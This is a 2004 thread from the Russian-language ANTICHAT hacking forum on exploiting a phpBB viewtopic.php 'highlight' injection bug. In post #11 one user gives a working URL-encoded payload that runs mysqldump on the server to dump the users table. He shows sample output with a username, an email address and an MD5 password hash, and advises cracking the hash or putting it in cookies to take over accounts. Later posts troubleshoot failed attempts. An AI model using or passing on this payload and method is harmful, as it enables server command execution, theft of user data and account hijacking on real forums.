ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 30.11.2004, 09:59
X-Seven
Новичок
Регистрация: 07.11.2004
Сообщений: 4
Провел на форуме:
0

Репутация: 0
По умолчанию

Насчёт дампа базы.
Mysql-база дампится запросами вида:
mysqldump -u -p dbname > file
После -u должнен идти dbuser,например -uadmin,
после -p dbpasswd,например -ppass,
с dbname,надеюсь,всё ясно.Но т.к. целиком база не нужна,
то нужно ещё указать конкретную её часть,а именно,phpbb_users.
(примечание:название может быть другое,например forum_users,как
узнать префикс,читай выше).
Вместо > лучше писать %3E
file-имя файла,куда должна сдампиться база(теоритически).У меня
phpbb_users просто вывелось на страницу.
ВНИМАНИЕ:В запросе важно указать ПОЛНЫЙ ПУТЬ К МУСКУЛЮ,а точнее,
к файлу mysqldump(путь надо предварительно разведать командами
типа ls или cd).Например,пути могут быть такими:
/usr/local/mysql/bin/mysqldump
/usr/local/bin/mysqldump
/usr/bin/mysqldump

Пример:
Если dbuser=root,dbpasswd=qwerty,dbname=baza,prefix=php bb_,
mysqldump лежит в /usr/bin/,запрос будет таким:

p=123&highlight=%2527.$poster=%60/usr/bin/mysqldump%09-uroot%09-pqwerty%09baza%09phpbb_users%09%3E%09file.sql%60.% 2527


Примечание:вместо всех пробелов надо писать %09,если темы P=123 не
существует,то надо изменить номер,например,на p=321,при копировании
строки запроса в браузер,могут появиться пробелы из-за переноса строки,
их надо удалить.

Если всё прошло удачно,то появится что-то типо этого:
- MySQL dump 8.23 -- -- Host: localhost Database: baze --------------------------------------------------------- -- Server version 3.23.58 -- -- Table structure for table `forum_users`.....

Интерес представляют хэши паролей:
INSERT INTO forum_users VALUES (14,1,'Зелёная','fae0b27c451c728867a567e8c1 bb4e53',1097589801,0,1097589801,1097589772,0,0,0.0 0,1,'russian','D M d, Y g:i a',0,0,0,NULL,1,1,0,1,1,1,1,1,0,1,1,0,'',0,'opa_ho pa@mail.ru','','','Иркутск','','','','','', '','','',NULL);
В данном случае Зелёная-логин,opa_hopa@mail.ru-мыло,на которое логин регился,
fae0b27c451c728867a567e8c1bb4e53 -MD5-хэш,что бы его сломать,надо юзать прогу
MD5Inside.
Примечание:хэш можно подставить в куки вместо своего.

Enjoy!
 
Ответить с цитированием

  #12  
Старый 30.11.2004, 13:38
rHoM
Новичок
Регистрация: 30.11.2004
Сообщений: 3
Провел на форуме:
0

Репутация: 0
По умолчанию

"We have 63383 registered users

Fatal error: Allowed memory size of 39797528 bytes exhausted (tried to allocate 18352939 bytes) in .../forum/viewtopic.php(1107) : regexp code on line 1
"

Как бороться?
 
Ответить с цитированием

  #13  
Старый 30.11.2004, 17:57
PEPSICOLA
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724

Репутация: 2944


По умолчанию

Ну вот что у меня появилось за место nickname у чела вылезло
-- MySQL dump 9.10 -- -- Host: localhost Database: pbb -- ------------------------------------------------------ -- Server version 4.0.18 )\b#i

Всё больше никучего нету. Подскажите что я не так сделал?
 
Ответить с цитированием

  #14  
Старый 01.12.2004, 00:42
rHoM
Новичок
Регистрация: 30.11.2004
Сообщений: 3
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от PEPSICOLA  
Ну вот что у меня появилось за место nickname у чела вылезло
-- MySQL dump 9.10 -- -- Host: localhost Database: pbb -- ------------------------------------------------------ -- Server version 4.0.18 )\b#i

Всё больше никучего нету. Подскажите что я не так сделал?
Аналогично у меня было, когда пытался ограничить кол-во выводимых записей параметром -w 'user-level=1'. В чем проблема?
 
Ответить с цитированием

  #15  
Старый 01.12.2004, 05:13
X-Seven
Новичок
Регистрация: 07.11.2004
Сообщений: 4
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от PEPSICOLA
Ну вот что у меня появилось за место nickname у чела вылезло
-- MySQL dump 9.10 -- -- Host: localhost Database: pbb -- ------------------------------------------------------ -- Server version 4.0.18 )\b#i

Всё больше никучего нету. Подскажите что я не так сделал?
У меня аналогичное выскакивало когда я неправильно указал префикс(вместо
стандартного phpbb_users надо было forum_users)
Путь к мускулю указан правильный.
Скорее всего,ты где-то ошибся при вводе данных(если dbuser,dbpasswd,dbname и table_prefix указаны верно,то база должна сдампиться).
Ещё в строчку могли попасться лишние пробелы.

Последний раз редактировалось X-Seven; 01.12.2004 в 05:18..
 
Ответить с цитированием

  #16  
Старый 02.12.2004, 19:57
nnn
Новичок
Регистрация: 19.11.2004
Сообщений: 9
Провел на форуме:
20912

Репутация: 0
По умолчанию

Все на много проще. Пофиксили этот баг. Но "лекарство" на рhрbb дано только одно, а версий форумов много и плюс при установке не у всех руки от куда надо росли, от сюда и вылезают всякие ")\b#i" и "MySQL dump 9.10"
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ